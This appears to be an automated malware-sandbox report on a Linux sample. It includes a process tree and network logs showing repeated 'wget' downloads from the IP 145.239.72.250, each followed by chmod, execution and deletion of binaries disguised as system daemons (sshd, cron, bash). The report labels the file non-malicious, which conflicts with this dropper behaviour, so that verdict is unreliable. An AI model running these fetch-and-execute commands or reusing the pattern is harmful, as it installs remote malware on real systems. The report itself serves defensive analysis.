Analysis Overview
SHA256
e8870d855c6592d00913d785affd6b7bd0496643450668d83b40d149c42d1239
Threat Level: No (potentially) malicious behavior was detected
The file b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118 was found to be: No (potentially) malicious behavior was detected.
Malicious Activity Summary
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-06-16 23:47
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-16 23:47
Reported
2024-06-16 23:49
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
1s
Max time network
129s
Command Line
Signatures
Processes
/tmp/b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118
[/tmp/b5d1b02949999a3eeb829840ff8d2fae_JaffaCakes118]
/usr/bin/wget
[wget http://145.239.72.250/ntpd]
/bin/chmod
[chmod +x ntpd]
/tmp/ntpd
[./ntpd]
/bin/rm
[rm -rf ntpd]
/usr/bin/wget
[wget http://145.239.72.250/sshd]
/bin/chmod
[chmod +x sshd]
/tmp/sshd
[./sshd]
/bin/rm
[rm -rf sshd]
/usr/bin/wget
[wget http://145.239.72.250/openssh]
/bin/chmod
[chmod +x openssh]
/tmp/openssh
[./openssh]
/bin/rm
[rm -rf openssh]
/usr/bin/wget
[wget http://145.239.72.250/bash]
/bin/chmod
[chmod +x bash]
/tmp/bash
[./bash]
/bin/rm
[rm -rf bash]
/usr/bin/wget
[wget http://145.239.72.250/tftp]
/bin/chmod
[chmod +x tftp]
/tmp/tftp
[./tftp]
/bin/rm
[rm -rf tftp]
/usr/bin/wget
[wget http://145.239.72.250/wget]
/bin/chmod
[chmod +x wget]
/tmp/wget
[./wget]
/bin/rm
[rm -rf wget]
/usr/bin/wget
[wget http://145.239.72.250/cron]
/bin/chmod
[chmod +x cron]
/tmp/cron
[./cron]
/bin/rm
[rm -rf cron]
/usr/bin/wget
[wget http://145.239.72.250/ftp]
/bin/chmod
[chmod +x ftp]
/tmp/ftp
[./ftp]
/bin/rm
[rm -rf ftp]
/usr/bin/wget
[wget http://145.239.72.250/pftp]
/bin/chmod
[chmod +x pftp]
/tmp/pftp
[./pftp]
/bin/rm
[rm -rf pftp]
/usr/bin/wget
[wget http://145.239.72.250/sh]
/bin/chmod
[chmod +x sh]
/tmp/sh
[./sh]
/bin/rm
[rm -rf sh]
/usr/bin/wget
[wget http://145.239.72.250/ ]
/bin/chmod
[chmod +x ]
/tmp/
[./ ]
/bin/rm
[rm -rf ]
/usr/bin/wget
[wget http://145.239.72.250/apache2]
/bin/chmod
[chmod +x apache2]
/tmp/apache2
[./apache2]
/bin/rm
[rm -rf apache2]
/usr/bin/wget
[wget http://145.239.72.250/telnetd]
/bin/chmod
[chmod +x telnetd]
/tmp/telnetd
[./telnetd]
/bin/rm
[rm -rf telnetd]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| FR | 145.239.72.250:80 | 145.239.72.250 | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 151.101.65.91:443 | | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.65.91:443 | | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| GB | 89.187.167.3:443 | | tcp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 195.181.164.20:443 | 1527653184.rsc.cdn77.org | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-16 23:47
Reported
2024-06-16 23:50
Platform
debian9-armhf-20240611-en
Max time network
38s
Command Line
Signatures
Processes
Network
| Country | Destination | Domain | Proto |
| FR | 145.239.72.250:80 | 145.239.72.250 | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
| FR | 145.239.72.250:80 | henosis.fr | tcp |
| US | 1.1.1.1:53 | henosis.fr | udp |
| FR | 145.239.72.250:443 | henosis.fr | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-16 23:47
Reported
2024-06-16 23:47
Platform
debian9-mipsbe-20240611-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-16 23:47
Reported
2024-06-16 23:47
Platform
debian9-mipsel-20240611-en